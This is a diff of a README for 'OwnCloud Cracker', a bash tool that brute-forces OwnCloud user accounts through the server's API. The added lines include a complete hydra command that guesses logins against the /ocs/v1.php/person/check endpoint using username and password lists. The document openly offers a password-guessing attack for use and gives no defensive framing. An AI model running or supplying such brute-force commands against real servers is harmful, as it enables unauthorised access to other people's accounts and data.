51x/OwnCloudCrack/README.md

 =====
 OwnCloud Cracker

 Bruteforce OwnCloud accounts using it's API.
+Yes, in bash!

+You can also use hydra if available: hydra 127.0.0.1 -L userlist.txt -P pass.txt "/ocs/v1.php/person/check:login=^USER^&password=^PASS^"

 Get help with the "-h" switch: ./ocrk.sh -h